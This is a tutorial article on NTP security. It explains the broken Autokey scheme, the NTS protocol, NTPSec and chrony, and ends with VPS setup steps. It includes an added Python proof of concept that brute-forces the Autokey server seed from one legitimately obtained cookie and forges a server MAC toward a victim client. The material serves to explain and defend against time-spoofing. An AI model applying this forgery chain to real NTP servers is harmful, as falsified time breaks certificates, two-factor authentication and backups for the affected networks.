How do you make sure that time is never wrong when you have a million large and small devices talking to each other over TCP/IP? Suppose each of them has a clock, and the time on all of them has to be correct. You cannot solve this problem without NTP.
Imagine that for one minute, in one part of a production IT infrastructure, time synchronization ran into trouble. Enterprise software clusters start to fall over, departments grind to a halt, admins and on-call engineers desperately try to restore the situation.
It is entirely possible that an attacker deliberately tries to break time with a MiTM or DDoS attack. In that case anything can happen:
- user account passwords expire;
- X.509 certificates expire;
- TOTP two-factor authentication stops working;
- backups and local files are treated as obsolete and the system deletes them;
- DNSSEC breaks.
Clearly any IT department that relies on a time synchronization service would like to be confident in the security of that service in production.
Breaking NTP in twenty-five minutes
Network protocols from the last millennium have one peculiarity: they are no longer good for anything, yet replacing them is not easy even when a critical mass of enthusiasm and money has accumulated.
The main complaint about classic NTP was the lack of a reliable mechanism for protecting it against attacks. Several attempts were made to fix this. First, a pre-shared key (PSK) scheme with symmetric keys was introduced.
Unfortunately, the price of that scheme's simplicity is that it does not scale. Manual configuration is required on the client side, tied to the server. This means you cannot simply add one more client, and if something changes on the NTP server, every client has to be reconfigured.
Then Autokey was released, but serious flaws were soon found in the design of the algorithm itself, and it was abandoned. The problem is that the server seed is only 32 bits long: small enough that a brute-force attack poses no computational difficulty.
- Autokey is the per-packet symmetric session key;
- MAC (message authentication code) is the checksum of the NTP packet.
The autokey is computed as follows:
    Autokey = H(Sender-IP || Receiver-IP || KeyID || Cookie)
where H() is a cryptographic hash function (MD5 in Autokey).
The same function is used to compute the packet checksum:
    MAC = H(Autokey || NTP packet)
It turns out that the whole integrity check of the packet rests on the secrecy of the cookie. Once you have the cookie, you can reconstruct the autokey and forge the MAC. The NTP server, however, mixes a secret seed into the cookies it generates. That is where the catch lies.
    Cookie = MSB_32(H(Client IP || Server IP || 0 || Server Seed))
The MSB_32 function takes the 32 most significant bits of the MD5 digest. A client's cookie stays the same as long as the server's parameters do not change. So the attacker only needs to recover the seed, and from then on can generate the cookie for any client himself.
First, connect to the NTP server as an ordinary client and obtain a cookie. After that, with modest brute force, the attacker recovers the seed using a simple algorithm.
Brute-force algorithm for recovering the seed. The candidate cookie is computed exactly as the server does it, with the same argument order and the MSB_32 truncation:
    for i = 0 .. 2^32 - 1 do
        Ci = MSB_32(H(Client-IP || Server-IP || 0 || i))
        if Ci = Cookie then
            return i
        end if
    end for
Both IP addresses are known, so all that is left is to compute up to 2^32 hashes until the generated cookie matches the one received from the NTP server. On an ordinary workstation with an Intel Core i5 this takes about twenty-five minutes.
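The algorithm above in runnable form, added here as a worked example; it is not the article's code or any NTP implementation's. Beyond what the article states, it assumes that IPv4 addresses enter the hash as their four packed bytes, that KeyID and the zero field are 32-bit big-endian integers, that H() is MD5 and that MSB_32 is the first four bytes of the digest (real Autokey lays these out differently, so the hash values are illustrative; the procedure is not). The search bound is a parameter so the demonstration finishes in seconds instead of the 25 minutes quoted for a full 2^32 scan; the seed, addresses and packet are constructed. It also carries the attack one step further than the text: once the seed is known, the attacker computes the cookie of any other client and forges a server MAC toward that victim.

```python
"""Autokey cookie recovery and MAC forgery, as a worked example of the algorithm above.
Added for this write-up; not code from the article or any NTP implementation.
Assumed encodings: IPv4 as 4 packed bytes, KeyID and the zero field as 32-bit
big-endian integers, H() = MD5, MSB_32 = first 4 digest bytes."""
import hashlib
import ipaddress
import struct


def H(data):
    return hashlib.md5(data).digest()


def packed(ip):
    return ipaddress.ip_address(ip).packed


def cookie(client_ip, server_ip, seed):
    """Cookie = MSB_32(H(Client IP || Server IP || 0 || Server Seed)); seed is the server's secret."""
    return H(packed(client_ip) + packed(server_ip) + struct.pack(">II", 0, seed))[:4]


def autokey(sender_ip, receiver_ip, key_id, cookie_bytes):
    """Autokey = H(Sender-IP || Receiver-IP || KeyID || Cookie): the per-packet session key."""
    return H(packed(sender_ip) + packed(receiver_ip) + struct.pack(">I", key_id) + cookie_bytes)


def mac(session_key, ntp_packet):
    """MAC = H(Autokey || NTP packet)."""
    return H(session_key + ntp_packet)


def recover_seed(client_ip, server_ip, observed_cookie, max_seed=2 ** 32):
    """The brute force from the article: try seeds in order until the cookie matches.
    Returns the seed, or None if no seed below max_seed reproduces the cookie."""
    for i in range(max_seed):
        if cookie(client_ip, server_ip, i) == observed_cookie:
            return i
    return None


def forge_server_mac(attacker_ip, server_ip, attacker_cookie, victim_ip, key_id,
                     ntp_packet, max_seed=2 ** 32):
    """Full chain: the attacker's own cookie gives the seed, the seed gives any
    client's cookie, and with it the session key the server would use toward that
    client, so an attacker-chosen packet to the victim carries a valid MAC."""
    seed = recover_seed(attacker_ip, server_ip, attacker_cookie, max_seed)
    if seed is None:
        raise ValueError("seed not found below max_seed")
    victim_cookie = cookie(victim_ip, server_ip, seed)
    return mac(autokey(server_ip, victim_ip, key_id, victim_cookie), ntp_packet)


if __name__ == "__main__":
    # Constructed scenario with a deliberately small seed so the scan takes seconds.
    SERVER, ATTACKER, VICTIM, SEED = "198.51.100.1", "192.0.2.10", "192.0.2.77", 0x1337
    observed = cookie(ATTACKER, SERVER, SEED)  # learned by simply acting as a client
    packet = b"\x24" + bytes(47)               # 48-byte NTPv4 header, contents irrelevant
    forged = forge_server_mac(ATTACKER, SERVER, observed, VICTIM, 1, packet, max_seed=2 ** 16)
    genuine = mac(autokey(SERVER, VICTIM, 1, cookie(VICTIM, SERVER, SEED)), packet)
    print("recovered seed:", hex(recover_seed(ATTACKER, SERVER, observed, 2 ** 16)))
    print("forged MAC accepted by the victim:", forged == genuine)
```

The point to notice is that the seed is the only secret in the whole scheme and it is shared across all clients: recovering it from one legitimately obtained cookie gives the attacker the server's signing capability toward every client, which is why no amount of per-client configuration could rescue Autokey.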
NTS - the new Autokey
A security hole of that size in Autokey could not be tolerated, and in 2012 a new protocol appeared. To break with the old name it was rebranded: Autokey v2 became Network Time Security.
NTS is a security extension for NTP and currently supports only unicast (client/server) mode. It provides strong cryptographic protection against packet forgery, prevents tracking of clients (unlinkability), tolerates loss of network packets, and introduces only a small loss of accuracy due to the secured connection.
An NTS exchange has two phases, each running on its own lower-level protocol. In the first phase the client and server agree on the parameters of the connection and the client receives cookies that carry the keys and everything else needed later. In the second phase a protected NTS session takes place between the client and the NTP server.

NTS rests on two lower-level protocols: Network Time Security Key Exchange (NTS-KE), which establishes a secure channel over TLS, and NTPv4, the latest incarnation of the NTP protocol. A little more about each below.
Step one - NTS-KE
At this step the NTP client opens a TLS session over a separate TCP connection to the NTS-KE server (the drafts current at the time allowed TLS 1.2 or 1.3; RFC 8915 as published requires TLS 1.3). During this session the following happens:
- the parties negotiate the AEAD algorithm for the second phase;
- the parties specify the protocol of the second phase, although currently only NTPv4 is supported;
- the parties determine the address and port of the NTP server;
- the NTS-KE server issues the NTPv4 cookies;
- the parties derive a pair of symmetric keys (C2S and S2C) from the TLS session via the TLS key exporter; these are the keys the server seals inside the cookies.
The big advantage of this approach is that the entire burden of securely transferring the connection parameters falls on the well-tested and trusted TLS standard. There is no need to reinvent the wheel for a secure NTP handshake.
Step two - NTP under NTS protection
In the second phase the client synchronizes time with the NTP server. To do so it adds four special extension fields (EFs) to the NTPv4 packet:
- the Unique Identifier Extension Field carries a random nonce to prevent replay attacks;
- the NTS Cookie Extension Field carries one of the client's NTP cookies. Since only the client holds the C2S and S2C AEAD keys, the NTP server has to recover them from the cookie;
- the NTS Cookie Placeholder Extension Field is how the client requests additional cookies from the server. It is needed so that the NTP server's response is no longer than the request, which prevents amplification attacks;
- the NTS Authenticator and Encrypted Extension Fields Extension Field carries the AEAD output computed under the C2S key, with the NTP header, timestamps and the EFs above as associated data. Without this field the timestamps could be forged.

After receiving the client's request, the server checks the validity of the NTP packet: it must decrypt the cookie and extract the AEAD algorithm and the keys. Once the NTP packet passes verification, the server answers the client with:
- a Unique Identifier Extension Field that mirrors the one in the client's request, the countermeasure against replay attacks;
- NTS Cookie Extension Fields with fresh cookies to continue the session (in the response these travel inside the encrypted part, so an observer cannot link a client's successive requests);
- an NTS Authenticator and Encrypted Extension Fields Extension Field with the AEAD output under the S2C key.
The second phase can be repeated many times without returning to the first, because every request/response pair gives the client new cookies. The advantage is that the TLS-heavy work of computing and transferring PKI data is decoupled from the frequent time requests. This suits dedicated FPGA timekeepers well: all the per-packet work fits into a few functions of the cryptography unit, while the TLS handshake is offloaded to another device.
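To make the second phase concrete, here is a toy model of the exchange in Python, added for this write-up; it is not code from the article, RFC 8915, NTPSec or chrony. The extension field type codes are the real ones from RFC 8915. Everything else is a stand-in: the AEAD is an HMAC-SHA256 encrypt-then-MAC construction in place of the mandated AES-SIV-CMAC-256, the C2S/S2C keys that NTS-KE would export from TLS are simply random, the server's cookie-sealing master key and the 48-byte header contents are made up, and server-side replay detection is left out.

```python
"""Toy model of NTS phase two (NTPv4 with NTS extension fields).
Added example, not code from the article or any NTP implementation. Assumptions:
the AEAD is HMAC-SHA256 encrypt-then-MAC instead of RFC 8915's AES-SIV-CMAC-256,
the C2S/S2C keys that NTS-KE exports from TLS are random, the server's cookie
master key and the 48-byte NTP header contents are made up, and the server does
no replay detection. The EF type codes are the real ones from RFC 8915."""
import hmac
import os
import struct
from hashlib import sha256

UID_EF, COOKIE_EF, PLACEHOLDER_EF, AUTH_EF = 0x0104, 0x0204, 0x0304, 0x0404
HDR_LEN, NONCE_LEN, TAG_LEN, KEY_LEN = 48, 16, 16, 32

def _keystream(key, nonce, n):
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, b"enc" + nonce + struct.pack(">I", ctr), sha256).digest()
        ctr += 1
    return out[:n]

def _tag(key, nonce, ad, ct):
    return hmac.new(key, b"tag" + struct.pack(">I", len(ad)) + ad + nonce + ct, sha256).digest()[:TAG_LEN]

def aead_seal(key, nonce, plaintext, ad):
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return ct + _tag(key, nonce, ad, ct)

def aead_open(key, nonce, sealed, ad):
    ct, tag = sealed[:-TAG_LEN], sealed[-TAG_LEN:]
    if not hmac.compare_digest(tag, _tag(key, nonce, ad, ct)):
        raise ValueError("AEAD authentication failed")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))

def ef(ef_type, body):
    """NTPv4 extension field: 16-bit type, 16-bit total length, body."""
    return struct.pack(">HH", ef_type, 4 + len(body)) + body

def parse_efs(buf, start):
    """(type, body, offset) for each EF from `start`; the offset delimits the associated data."""
    i, out = start, []
    while i < len(buf):
        t, n = struct.unpack_from(">HH", buf, i)
        if n < 4:
            raise ValueError("bad extension field length")
        out.append((t, buf[i + 4:i + n], i))
        i += n
    return out

def _auth_field(key, plaintext, ad):
    nonce = os.urandom(NONCE_LEN)
    sealed = aead_seal(key, nonce, plaintext, ad)
    return ef(AUTH_EF, struct.pack(">HH", NONCE_LEN, len(sealed)) + nonce + sealed)

def _open_auth_field(key, pkt, efs):
    body, off = next((b, o) for t, b, o in efs if t == AUTH_EF)
    nl, cl = struct.unpack_from(">HH", body)
    return aead_open(key, body[4:4 + nl], body[4 + nl:4 + nl + cl], pkt[:off])

def make_cookie(master_key, c2s, s2c):
    """The session keys sealed under the server's own key; opaque to the client."""
    nonce = os.urandom(NONCE_LEN)
    return nonce + aead_seal(master_key, nonce, c2s + s2c, b"")

def open_cookie(master_key, cookie):
    keys = aead_open(master_key, cookie[:NONCE_LEN], cookie[NONCE_LEN:], b"")
    return keys[:KEY_LEN], keys[KEY_LEN:]

def ntske(master_key, n_cookies=8):
    """Phase one stand-in: real NTS derives C2S/S2C from the TLS session."""
    c2s, s2c = os.urandom(KEY_LEN), os.urandom(KEY_LEN)
    return c2s, s2c, [make_cookie(master_key, c2s, s2c) for _ in range(n_cookies)]

def client_request(c2s, cookie, header, n_placeholders):
    """Header, Unique Identifier, one cookie and placeholders, all authenticated under C2S."""
    uid = os.urandom(32)
    ad = header + ef(UID_EF, uid) + ef(COOKIE_EF, cookie)
    ad += ef(PLACEHOLDER_EF, bytes(len(cookie))) * n_placeholders  # each as long as a cookie
    return ad + _auth_field(c2s, b"", ad), uid

def server_respond(master_key, request, reply_header):
    """Unseal the cookie, verify the request, reply with fresh cookies encrypted under S2C."""
    efs = parse_efs(request, HDR_LEN)
    fields = {t: b for t, b, _ in efs}
    c2s, s2c = open_cookie(master_key, fields[COOKIE_EF])
    _open_auth_field(c2s, request, efs)  # raises if header or any EF was altered
    n_new = 1 + sum(1 for t, _, _ in efs if t == PLACEHOLDER_EF)
    cookies = b"".join(ef(COOKIE_EF, make_cookie(master_key, c2s, s2c)) for _ in range(n_new))
    ad = reply_header + ef(UID_EF, fields[UID_EF])  # nonce echoed in the clear
    return ad + _auth_field(s2c, cookies, ad)

def client_verify(s2c, uid, response):
    """Drop foreign or replayed replies by UID, then authenticate and decrypt the new cookies."""
    efs = parse_efs(response, HDR_LEN)
    if {t: b for t, b, _ in efs}.get(UID_EF) != uid:
        raise ValueError("unique identifier mismatch")
    plain = _open_auth_field(s2c, response, efs)
    return [b for t, b, _ in parse_efs(plain, 0) if t == COOKIE_EF]
```

Note what the associated data covers: everything from the first byte of the header up to the authenticator field, so flipping a single bit of a timestamp or of a placeholder makes the AEAD check fail, while the client separately refuses any reply whose Unique Identifier is not the one it sent. The fresh cookies exist only inside the encrypted part of the reply, which is what keeps a client's successive requests unlinkable to an observer. One consumed cookie plus two placeholders yields three new ones, so the client's supply is replenished without ever returning to NTS-KE.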
NTPSec
What is special about NTP? Although the author of the protocol, Dave Mills, tried to document his code as well as he could, it takes an unusual programmer to grasp the intricacies of a 35-year-old time synchronization algorithm. Part of the code predates POSIX, when the Unix API was quite different from what is used today. On top of that, you need a grasp of statistics to pull the signal out of the noise on a jittery line.
NTS is not the first attempt to put NTP in order. Once attackers learned to exploit NTP's weaknesses to amplify DDoS attacks, it became clear that radical change was needed. While the NTS documents were still being discussed and edited, at the end of 2014 the US National Science Foundation issued an urgent grant for improving NTP.
The working group was led not by just anybody, but by Eric S. Raymond, one of the founders and pillars of the Open Source community and a well-known author. The first thing Eric and his colleagues tried was to move the NTP code from the BitKeeper platform to git, but that did not pan out. Project leader Harlan Stenn opposed the move and the discussion stalled. So it was decided to fork the project's code, and NTPSec was born.
Broad experience, including work on GPSD, a solid grounding in mathematics and the black art of reading ancient code: Eric Raymond is a hacker capable of pulling off a task like this. The team found a code migration specialist, and in just 10 weeks NTP was on GitLab. The work went smoothly.
Eric Raymond's team approached the job the way Auguste Rodin approached a block of stone. By cutting away 175 KLOC of legacy code they shrank the attack surface, closing many security holes along the way.
Here is an incomplete list of what was removed from the distribution:
- undocumented, obsolete, deprecated or broken features;
- the unused ISC library;
- libopts / autogen;
- legacy Windows code;
- ntpdc;
- Autokey;
- ntpq, rewritten from C in Python;
- sntp/ntpdig, rewritten from C in Python.
Besides cleaning up the code, the project has other merits. Here is a partial list of achievements:
- Protection against buffer overflows was strengthened. To prevent overflows, every unsafe string function (strcpy/strcat/strtok/sprintf/vsprintf/gets) was replaced with a bounded variant that enforces the buffer size.
- NTS support was added.
- Precision improved by an order of magnitude by binding to physical hardware. Computer clocks have become far more accurate than they were when NTP was born; the main beneficiaries are GPSDOs and dedicated time radios.
- The number of programming languages was cut to two. Instead of Perl, awk and even S scripts, everything is Python, which opens more opportunities for code reuse.
- Instead of a tangle of autotools scripts, the project moved to a different build system.
- The documentation was updated and organized. From a contradictory and in places outdated collection they produced coherent documentation: every command-line option and every configuration directive now has exactly one authoritative description, and man pages and the web documentation are generated from the same source files.
NTPSec is packaged for a number of Linux distributions. At the time of writing the latest stable version is 1.1.8; Gentoo Linux lags slightly behind.
(1:696)$ sudo emerge -av ntpsec
These are the packages that would be merged, in order:
Calculating dependencies... done!
[ebuild R ] net-misc/ntpsec-1.1.7-r1::gentoo USE="samba seccomp -debug -doc -early -gdb -heat -libbsd -nist -ntpviz -rclock_arbiter -rclock_generic -rclock_gpsd -rclock_hpgps -rclock_jjy -rclock_local -rclock_modem -rclock_neoclock -rclock_nmea -rclock_oncore -rclock_pps -rclock_shm -rclock_spectracom -rclock_trimble -rclock_truetime -rclock_zyfer -smear -tests" PYTHON_TARGETS="python3_6" 0 KiB
Total: 1 package (1 reinstall), Size of downloads: 0 KiB
Would you like to merge these packages? [Yes/No]
Chrony
There is another attempt to replace legacy NTP with something more secure. Chrony, unlike NTPSec, was written from scratch and designed to work reliably in a wide range of conditions, including unstable network connections, intermittent or congested network access, and temperature changes. On top of that chrony has other advantages:
- chrony can synchronize the system clock quickly and with high accuracy;
- chrony is small, uses little memory, and touches the CPU only when needed, a big plus for saving resources and power;
- chrony supports hardware timestamping on Linux, which allows very accurate synchronization on local networks.
On the other hand, chrony lacks some features of classic NTP, such as the broadcast and multicast client/server modes. Classic NTP also supports a larger number of operating systems and platforms.
To disable the server function and stop chronyd from answering NTP requests, it is enough to write "port 0" in chrony.conf. This is done when there is no need to serve time to NTP clients or peers. Note that since version 2.0 the NTP port is opened only when an allow directive is configured, or NTP peers are configured, or a broadcast directive is used.
The program consists of two components:
- chronyd is the daemon running in the background. It gathers information about the difference between the system clock and external time servers and disciplines the local clock. It implements the NTP protocol and can act as a client or a server.
- chronyc is the command-line utility for monitoring and controlling the daemon. It is used to adjust various parameters, for example it lets you add or remove NTP servers while chronyd is running.
Since version 7 of Red Hat Enterprise Linux, chrony is the default time synchronization service. The package is also available in other Linux distributions. The latest stable version is 3.5, with v4.0 in preparation.
(1:712)$ sudo emerge -av chrony
These are the packages that would be merged, in order:
Calculating dependencies... done!
[binary N ] net-misc/chrony-3.5-r2::gentoo USE="adns caps cmdmon ipv6 ntp phc readline refclock rtc seccomp (-html) -libedit -pps (-selinux)" 246 KiB
Total: 1 package (1 new, 1 binary), Size of downloads: 246 KiB
Would you like to merge these packages? [Yes/No]
Now, how to set up a dedicated chrony server on the internet for synchronizing time in a corporate network. Below is an example of the setup on a VPS.
An example of setting up chrony on RHEL/CentOS on a VPS
Let's do a small exercise and set up our own NTP server on a VPS. It is simple: choose a suitable plan on the RuVDS website, get a ready-made server and type a dozen simple commands. For our purposes this option is quite sufficient.

Let's get on with the setup and first install the chrony package.
[root@server ~]$ yum install chrony
RHEL 8 / CentOS 8 uses a different package manager.
[root@server ~]$ dnf install chrony
After installing chrony, enable and start the service (the systemd unit is called chronyd).
[root@server ~]$ systemctl enable --now chronyd
If you wish, edit /etc/chrony.conf and replace the pool servers with the nearest regional ones to reduce response time. The server must also be told which clients it may answer: as noted above, without an allow directive chronyd 2.0 and later does not open the NTP port at all, and the firewall rule below would let traffic in for nothing. The network range here is a placeholder; replace it with your corporate range.
# Use public servers from the pool.ntp.org project.
# Please consider joining the pool (http://www.pool.ntp.org/join.html).
server 0.ru.pool.ntp.org iburst
server 1.ru.pool.ntp.org iburst
server 2.ru.pool.ntp.org iburst
server 3.ru.pool.ntp.org iburst
# Serve time only to the corporate network (placeholder range, adjust to yours).
allow 192.168.0.0/16
Next, start synchronizing the node's own clock with the specified pool.
[root@server ~]$ timedatectl set-ntp true
[root@server ~]$ systemctl restart chronyd.service
The NTP port must also be opened to the outside, otherwise the firewall will block incoming connections from the clients.
[root@server ~]$ firewall-cmd --add-service=ntp --permanent
[root@server ~]$ firewall-cmd --reload
On the client side it is enough to set the time zone correctly.
[root@client ~]$ timedatectl set-timezone Europe/Moscow
In /etc/chrony.conf specify the IP address or host name of our VPS running the chrony NTP server.
server my.vps.server
And finally, start time synchronization on the client.
[root@client ~]$ systemctl enable --now chronyd
[root@client ~]$ timedatectl set-ntp true
Next time I will tell you what options there are for time synchronization without internet access.
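As an added example, not part of the original article, here is what the same server/client pair looks like once both run chrony 4.0, the release that adds the NTS support described earlier; the 3.5 package installed above does not understand the nts directives. The server answers only the corporate network, authenticates itself to clients over NTS-KE with a certificate they trust, and keeps its cookie-sealing keys across restarts; the client uses NTS toward the server and refuses to serve anybody itself. Host names, certificate paths and the network range are placeholders.

```conf
# /etc/chrony.conf on the VPS (server side, chrony 4.0 or later)
server 0.ru.pool.ntp.org iburst
server 1.ru.pool.ntp.org iburst
# Answer only the corporate network; without allow the NTP port stays closed.
allow 192.168.0.0/16
# NTS-KE listens on TCP 4460 by default and presents this certificate to clients.
ntsservercert /etc/pki/tls/certs/ntp.example.com.crt
ntsserverkey  /etc/pki/tls/private/ntp.example.com.key
# Keys used to seal NTS cookies survive a restart when saved here.
ntsdumpdir /var/lib/chrony
# No remote control port.
cmdport 0

# /etc/chrony.conf on a client (chrony 4.0 or later)
server ntp.example.com iburst nts
# Cache the NTS-KE result (keys and cookies) between restarts.
ntsdumpdir /var/lib/chrony
# This host serves time to nobody.
port 0
```

On the server, TCP port 4460 has to be opened in addition to UDP 123 (firewall-cmd --add-port=4460/tcp --permanent). On the client, chronyc authdata shows for each source whether NTS is in use and which AEAD was negotiated; a source that stays at "none" usually means the client could not validate the server's certificate.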
source: www.habr.com
